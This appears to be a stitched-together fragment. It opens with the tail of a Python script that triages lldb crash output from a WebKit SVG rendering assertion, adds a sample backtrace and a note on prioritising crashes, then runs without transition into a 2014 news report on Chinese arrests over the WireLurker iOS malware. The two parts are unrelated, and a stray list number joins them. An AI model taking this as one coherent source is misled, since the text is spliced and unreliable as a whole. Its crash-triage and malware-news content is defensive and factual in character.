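    stop = STOP_RE.search(text)
    frames = parse_frames(text)
    strings = [m.group(2) for m in STRING_REG_RE.finditer(text)]
    expr = next((s for s in strings if not s.endswith(SOURCE_SUFFIXES)), None)
    src = next((s for s in strings if s.endswith(SOURCE_SUFFIXES)), None)
    symbols = {f.symbol for f in frames}
    reason = stop.group(1) if stop else "unknown"
    if "__assert_rtn" in symbols or "abort" in symbols:
        cls = "assertion failure (deliberate abort): a crash, not by itself evidence of memory corruption"
    elif any(k in reason for k in ("SIGSEGV", "SIGBUS", "EXC_BAD_ACCESS")):
        cls = "memory access fault: needs memory-safety analysis"
    else:
        cls = "unclassified"
    return Triage(
        stop_reason=reason,
        frames=frames,
        assertion_expr=expr,
        assertion_file=src,
        faulting_frame=next((f for f in frames if f.symbol not in ABORT_PATH), None),
        first_webcore_frame=next((f for f in frames if f.module == "WebCore"), None),
        classification=cls,
    )


# Constructed excerpt assembled from lines of the report above.
SAMPLE_LLDB = """\
* thread #1: tid = 0xc2e73, 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
(lldb) register read
General Purpose Registers:
  rax = 0x0000000000000000
  r12 = 0x00007fff84b36487  "transform_is_valid(m)"
  r14 = 0x00007fff747ae300  libsystem_pthread.dylib`_thread
  r15 = 0x00007fff84b36477  "Paths/CGPath.cc"
(lldb) bt
  * frame #0: 0x00007fff8ab10282 libsystem_kernel.dylib`__pthread_kill + 10
    frame #1: 0x00007fff904df4c3 libsystem_pthread.dylib`pthread_kill + 90
    frame #2: 0x00007fff88d36b73 libsystem_c.dylib`abort + 129
    frame #3: 0x00007fff88cfec59 libsystem_c.dylib`__assert_rtn + 321
    frame #4: 0x00007fff84643cb6 CoreGraphics`CGPathCreateMutableCopyByTransformingPath + 242
    frame #5: 0x00007fff84692a2f CoreGraphics`CGContextAddPath + 93
    frame #6: 0x00007fff8e9b5f04 WebCore`WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
    frame #7: 0x00007fff8f479ad1 WebCore`WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65
"""

if __name__ == "__main__":
    t = triage(SAMPLE_LLDB)
    print(t.stop_reason, "|", t.assertion_expr, "@", t.assertion_file)
    print("faulting:", t.faulting_frame.module, t.faulting_frame.symbol)
    print(t.classification)
```

The classification matters for prioritisation: an assertion abort reached through __assert_rtn is a reliable renderer crash (denial of service) and the assertion text tells you which invariant the input violated, while a fault with no abort path on the stack needs the memory-safety analysis before its severity can be judged.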
  20. It's been almost two weeks since the existence of the WireLurker malware was revealed for the first time, and Chinese authorities have arrested three suspects who are allegedly the authors of the Mac- and iOS-based malware that may have infected as many as hundreds of thousands of Apple users. The Beijing Bureau of Public Security has announced the arrest of three suspects charged with distributing the WireLurker malware through a popular Chinese third-party online app store. The authorities also say the website responsible for spreading the malware has been shut down. "WireLurker" malware was originally discovered earlier this month by security firm Palo Alto Networks targeting Apple users in China. The malware appeared to be the first malicious software program with the ability to penetrate the iPhone's strict software controls. The main concern about this threat was its ability to attack non-jailbroken iOS devices. Once a device is infected with the malware, it can download malicious and unapproved apps, designed to steal information, from third-party app stores, and if it detects an iOS device connected through the USB port, it installs the malicious apps on that device as well. Unlike most iPhone malware, WireLurker can install even on non-jailbroken iOS devices because the malware authors used enterprise certificates to sign the apps. Apple has since revoked the cryptographic certificates used to sign WireLurker and blocked all the apps signed with them. Palo Alto estimated that hundreds of thousands of users installed the malicious apps. China appears to have taken the threat very seriously and within two weeks arrested three individuals who are believed to be the creators of the malicious software. There are not many details available about the arrest, as the Bureau has simply posted a short notification on Sina Weibo, a Chinese microblogging service.
According to the Chinese authorities, the three suspects are identified as "Chen," "Lee" and "Wang," who are suspected of manufacturing and distributing the malicious program "for illegal profit," and the Chinese authorities were helped in the investigation by researchers from the Chinese AV company Qihoo 360. Source: http://thehackernews.com/2014/11/suspected-wirelurker-ios-malware.html